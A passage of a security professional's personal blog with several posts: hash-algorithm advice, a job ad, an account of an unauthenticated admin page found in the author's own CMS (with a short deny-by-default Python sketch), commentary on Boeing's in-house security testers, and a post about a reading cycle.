are designing a new system we recommend using SHA-256 or greater. MD5 is
considered completely broken, and SHA-1
is considered well on its way out. If you have a system that
uses either MD5 or SHA-1, consider making changes as soon as
possible.
Security Innovation, the company I work for, is hiring! If you
aren't completely and utterly excited about the job you currently
have, come work for us. We have some of the best perks in the
industry and you'll be having as much fun as you've ever had at
work.
To apply, send an e-mail to email@example.com
or try your hand at our challenge website at http://challenge.si.vc. If you get
stuck on the challenge just send an e-mail to the e-mail address
above and we'll give you a hint. The challenge is supposed to be
fun, so have fun with it!
- Posted by
I've been in the Security Industry for about ten years now. I
say that not to brag, but to give context for the rest of this
post. I've assessed countless pieces of software of nearly every
type, web apps, web services, desktop, firmware, mobile, Operating
Systems, and more. So believe me when I say this is a bit of a
tough post to write.
Up until about a month ago Joe_CMS had a major
security vulnerability in it.
But let me start at the beginning and tell the story in
chronological order. I've been working on a new CMS, one that would opt for simplicity and just the
right set of features so it's easy to use and very easy to
administer. Before I open source it, I wanted to deploy it to a few
of the sites that I run (Technically Learning, My Wife's Site, and this one).
I've been happily finding little bugs here and there and have
generally been happy with how it's shaping up. I even think a few
weeks ago I told a friend that it was "getting close."
A little more than a month ago I browsed to my site to publish a
new blog post and noticed the title of my blog had changed. I
thought that was very odd because it hadn't changed to something
recognizable, but rather to something like the random values that an
automated tool may inject to look for injection vulnerabilities. I
immediately suspected my coworkers and asked around. Nobody knew a
thing.
I checked over all the settings that are configurable online;
the database strings were correct, the passwords were good,
everything seemed to be in order. I did think that since the site
doesn't go over SSL (something I intend to fix soon) that perhaps
my session or credentials were stolen and somebody changed the
settings manually. I changed all my passwords, added a longer
random registration code and decided to wait it out.
A few weeks ago, it happened again! I again checked all
the settings, which had all been overwritten again, and immediately
started to think about how this could have happened. Did my hosting
provider get popped? My database? Surely it's not my own code...
Finally something dawned on me. I logged out and browsed directly
to http://whoisjoe.com/Settings.aspx. The page was wide
open. I had forgotten to require authentication on the Admin
Settings page!! I extended the ASP.NET BasePage as AdminPage to
require authentication on any page, as long as I remember to change
the inheritance. If you try to author a post, edit a page or modify
any template you have to log in. Somehow the settings page slipped
my mind and it was dangling out naked on the internet for who knows
how long. Luckily it looks like it was just bots and spiders that
found the issue, but had a real hacker discovered it, things could
have been much, much worse.
This is exactly the kind of issue I look for and find in all
kinds of web applications. Forceful browsing is all over the place.
A developer assumes that because a page isn't linked to, it isn't
accessible or won't be discovered, but in reality any page that
isn't explicitly protected is vulnerable. In addition to this
assumption, one must also assume every vulnerability will be found.
Every XSS, every SQLi, every CSRF issue will be found given
enough time. This means that these cannot exist in your
application. I missed authentication on one page, and if the wrong
person had found it they could have easily compromised my
entire website, making it a hotbed for malware drive-by
downloads.
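One defensive pattern against this class of bug is deny-by-default: instead of remembering to protect each admin page, require authentication everywhere and explicitly whitelist the public pages, so a forgotten page fails closed. A minimal sketch in Python (the original site is ASP.NET; the paths and function here are my own illustration of the idea, not the actual code):

```python
# Deny-by-default: every path requires auth unless explicitly marked public.
PUBLIC_PAGES = {"/", "/Blog.aspx"}

def handle_request(path: str, logged_in: bool) -> str:
    # A page the developer forgot about is NOT in PUBLIC_PAGES,
    # so it gets the auth check automatically.
    if path not in PUBLIC_PAGES and not logged_in:
        return "302 redirect to /Login.aspx"
    return "200 OK"

print(handle_request("/Settings.aspx", logged_in=False))  # blocked, even if forgotten
print(handle_request("/", logged_in=False))               # public page still works
```

With my inheritance scheme the safe behavior had to be opted into per page; with deny-by-default, forgetting a page means it is locked down rather than wide open.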
Now that we've found the last bug in Joe_CMS I feel confident
it's ready to ship... right?
- Posted by
Boeing's systems need to be capable of staving off hackers, and
for more than two years, the company has
employed two "hackers" to test the security of its computer
systems. I like it, but there's more that needs to be done.
Since most large organizations rely on a mix of COTS hardware,
3rd party software applications, communication technologies, and
custom code to run their IT infrastructure, it's difficult to apply
a single security assessment solution to ensure adequate coverage
and protection. If organizations want to better understand where
they are most vulnerable, they need to view their systems
holistically. This is, after all, how real-world hackers work -
there is no "in scope" or "out of scope" and they can target any
soft spot in the exterior.
Performing penetration tests and code reviews of selected
software applications is a best practice for data security,
along with network penetration testing, but it tends to approach
security from the inside out and doesn't always follow chaining
paths between vulnerable systems. This makes it more difficult to
understand with certainty which hardware and software applications
are putting your organization at real risk of attack.
Organizations must secure thoroughly from within. This means
considering every avenue of attack and securing each layer and
component as well as possible. How do you do this? Internal (Red
Teams) and external penetration testing. Red teams are internal
resources that you deploy to attack an asset to determine if it's
vulnerable. When the development team thinks all risks and threats
have been mitigated, it's time to bring on the Red Team. The Red
Team's job should be to find any way into the system possible.
Put another way, think of it as product competition. Take the
mobile phone industry for example: it is up to each phone developer
to create the best feature sets and the usability possible, but
it's not impossible for the competition to think up something
completely new, change the game and win. Each company must at once
think of the current competitive landscape and imagine how the game
may change completely if a competitor hits on "the next big thing."
Before the iPhone everybody was competing on the same features and
the same understanding of usability. It wasn't until Apple ushered
in this renaissance of the smartphone era that we could jar
something as beautiful and usable as the Windows Phone 7.
In that way the development and test teams need to use every
tool at their disposal (both manual and automated) to find and
remediate every risk they can. Research all the current threats,
attack types, etc., but never lose sight of thinking about the next
thing that will utterly change the security landscape.
My final thoughts:
- Boeing is a company of about 165,000 employees, with thousands
of computer systems, tons of sensitive information, government and
flight data that hackers would love to get their hands on. All this
and they have two college kids securing their stuff? They need
dozens more, whether they are internal or external.
- The article quotes "Sims, 25, and Tam, 24, spend much of their
days devising, revising and analyzing complicated security programs
that they then attempt to crack." These two guys are in charge of
building AND breaking security systems. This doesn't work (at least
not well). I design a system to be resilient against the threats I
know about - so by definition I cannot break it.
- It's critical to get independent, expert eyes into the mix.
They have no conflict of interest, and they come in with a larger
arsenal of attacks and a fresh mind to assess the system.
- The best (and often only) way to understand how an attacker
views your IT systems/infrastructure and takes advantage of
insecurities is to do the same. Too few organizations employ this
approach, which we feel is so integral to data security that we
created a program to serve this specific need.
- Posted by
I don't read a lot, but over the last few years I've developed a
book choice cycle that works really well for me. It helps me finish
challenging books that I want to read for development, and entices
me to be selective about the "fun" books I burn through. My reading
cycle is: one "fun" book, one personal development book and one
professional development book.
My first book can be something fun. I just finished
The Hunger Games trilogy, which I classified as fun books. They
were so quick to read, I counted all three as one fun book
(probably strictly cheating). These are great as a mental vacation;
they're easy to read, and I don't expect to gain much more than
entertainment from them.
The next book is a personal development book. The last book I
read in this category was
How to Practice: The Way to a Meaningful Life by the Dalai
Lama. I've been on a bit of a buddhism kick lately, and this
was a wonderful book to read. The key concepts of mindfulness,
managing expectations and general happiness are great things to
think about regularly. Right now I've decided
George Orwell's 1984 counts as a personal development book,
because after The Hunger Games I needed something with a bit more
philosophy and direct commentary to it.
The third book in the cycle is a professional development book.
The Trusted Advisor or a technical book that will teach me a
new skill or polish an existing one counts here. I found that
sometimes, if I'm not careful, these books can linger in my bag,
unfinished, which is why I keep the "fun" book close by to trick
myself into finishing this one so I can eat my dessert.
Of course, every person will think differently about why they
read, how they read and what they hope to get out of their books.
For me this cycle works really well. I love reading books out of
each category, and I like the variety the different categories provide.